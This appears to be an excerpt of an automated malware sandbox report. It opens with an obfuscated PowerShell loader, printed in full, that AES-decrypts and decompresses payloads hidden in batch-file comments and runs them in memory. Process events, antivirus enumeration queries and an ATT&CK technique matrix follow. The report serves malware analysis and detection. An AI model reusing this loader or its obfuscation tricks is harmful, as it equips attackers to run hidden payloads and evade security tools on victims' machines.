ufdah($ovjgu,$fjsel){ invoke-expression '$qhidz=oni[onisoniyonisonitonieonimoni.onironieonifonilonieoniconitoniioniooninoni.oniaonisonisonieonimoniboniloniyoni]oni::oniloniooniaonidoni([byte[]]$ovjgu);'.replace('oni', ''); invoke-expression '$enoqz=$qhidz.onieoninonitonironiyoniponiooniioninonitoni;'.replace('oni', ''); invoke-expression '$enoqz.oniioninonivonioonikonieoni(oni$oninoniuoniloniloni, $fjsel)oni;'.replace('oni', '');}$dnwgy = 'c:\users\user\desktop\q5n7wopk8j.bat';$host.ui.rawui.windowtitle = $dnwgy;$ymrtg=[system.io.file]::readalltext($dnwgy).split([environment]::newline);foreach ($kglhr in $ymrtg) { if ($kglhr.startswith(':: ')) { $qobbt=$kglhr.substring(3); break; }}$ucmwf=[string[]]$qobbt.split('\');invoke-expression '$ooasd=hckuz (ntiwb (oni[oniconiooninonivonieonironitoni]oni:oni:onifonironioonimoniboniaonisonieoni6oni4onisonitonironiioninonigoni($ucmwf[0])));'.replace('oni', '');invoke-expression '$owbfa=hckuz (ntiwb (oni[oniconiooninonivonieonironitoni]oni:oni:onifonironioonimoniboniaonisonieoni6oni4onisonitonironiioninonigoni($ucmwf[1])));'.replace('oni', '');ufdah $ooasd $null;ufdah $owbfa (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function ntiwb($ovjgu){ $dmvwb=[system.security.cryptography.aes]::create(); $dmvwb.mode=[system.security.cryptography.ciphermode]::cbc; $dmvwb.padding=[system.security.cryptography.paddingmode]::pkcs7; $dmvwb.key=[system.convert]::frombase64string('q/epifuuitezpvuxmorjuzkedtokijbaspqpvgeuziy='); $dmvwb.iv=[system.convert]::frombase64string('2eftlv8xy+wg1xp7cznzrq=='); $bbzad=$dmvwb.createdecryptor(); $hlxqz=$bbzad.transformfinalblock($ovjgu, 0, $ovjgu.length); $bbzad.dispose(); $dmvwb.dispose(); $hlxqz;}function hckuz($ovjgu){ invoke-expression '$vrbtd=new-object onisoniyonisonitonieonimoni.oniioniooni.onimonieonimonioonironiystonironieoniamoni(,$ovjgu);'.replace('oni', ''); invoke-expression '$gbzbj=new-object onisoniyonisonitonieonim.oniioniooni.monieonimonioonironiyonisonitonironieoniaonimoni;'.replace('oni', ''); invoke-expression '$qvkjb=new-object soniyonisonitonieonimoni.oniioniooni.oniconioonimoniponironieonissoniiooninoni.gonizioniponisonitonironieoniaonimoni($vrbtd, [oniioniooni.oniconioonimoniponironieonisonisoniioniooninoni.oniconioonimoniponironieonisonisoniioniooninonimonioonidonieoni]::donieconiomoniproniesonis);'.replace('oni', ''); $qvkjb.copyto($gbzbj); $qvkjb.dispose(); $vrbtd.dispose(); $gbzbj.dispose(); $gbzbj.toarray();}function ufdah($ovjgu,$fjsel){ invoke-expression '$qhidz=oni[onisoniyonisonitonieonimoni.onironieonifonilonieoniconitoniioniooninoni.oniaonisonisonieonimoniboniloniyoni]oni::oniloniooniaonidoni([byte[]]$ovjgu);'.replace('oni', ''); invoke-expression '$enoqz=$qhidz.onieoninonitonironiyoniponiooniioninonitoni;'.replace('oni', ''); invoke-expression '$enoqz.oniioninonivonioonikonieoni(oni$oninoniuoniloniloni, $fjsel)oni;'.replace('oni', '');}$dnwgy = 'c:\windows\$cnt-onimai2\$cnt-co2.bat';$host.ui.rawui.windowtitle = $dnwgy;$ymrtg=[system.io.file]::readalltext($dnwgy).split([environment]::newline);foreach ($kglhr in $ymrtg) { if ($kglhr.startswith(':: ')) { $qobbt=$kglhr.substring(3); break; }}$ucmwf=[string[]]$qobbt.split('\');invoke-expression '$ooasd=hckuz (ntiwb (oni[oniconiooninonivonieonironitoni]oni:oni:onifonironioonimoniboniaonisonieoni6oni4onisonitonironiioninonigoni($ucmwf[0])));'.replace('oni', '');invoke-expression '$owbfa=hckuz (ntiwb (oni[oniconiooninonivonieonironitoni]oni:oni:onifonironioonimoniboniaonisonieoni6oni4onisonitonironiioninonigoni($ucmwf[1])));'.replace('oni', '');ufdah $ooasd $null;ufdah $owbfa (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,37_2_0000000140002300
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,37_2_0000000140002300
Source: dwm.exe, 00000029.00000000.1761597762.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000029.00000002.2615732842.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd
Source: conhost.exe, 00000016.00000002.2550727670.00000166BC350000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2568272227.0000022F1C800000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.1740126086.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000016.00000002.2550727670.00000166BC350000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2568272227.0000022F1C800000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.1740126086.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: conhost.exe, 00000016.00000002.2550727670.00000166BC350000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2568272227.0000022F1C800000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.1740126086.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
Source: conhost.exe, 00000016.00000002.2550727670.00000166BC350000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001C.00000002.2568272227.0000022F1C800000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000026.00000000.1740126086.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\System32\cmd.exeCode function: 21_3_000001F1197A2AF0 cpuid 21_3_000001F1197A2AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$cnt-sYvLLQ2I VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$cnt-sYvLLQ2I VolumeInformation
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,37_2_0000000140002300
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F1197D8090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,21_2_000001F1197D8090
Source: dllhost.exe, svchost.exe, 00000031.00000003.1871573480.000002A76AE6F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.1825139407.000002A76AE6F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts12
Windows Management Instrumentation
1
Scripting
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
11
Input Capture
1
System Time Discovery
Remote Services1
Archive Collected Data
2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Native API
1
DLL Side-Loading
1
Access Token Manipulation
1
Obfuscated Files or Information
LSASS Memory2
File and Directory Discovery
Remote Desktop Protocol11
Input Capture
1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts222
Command and Scripting Interpreter
11
Scheduled Task/Job
713
Process Injection
1
Software Packing
Security Account Manager132
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts11
Scheduled Task/Job
21
Registry Run Keys / Startup Folder
11
Scheduled Task/Job
1
DLL Side-Loading
NTDS261
Security Software Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
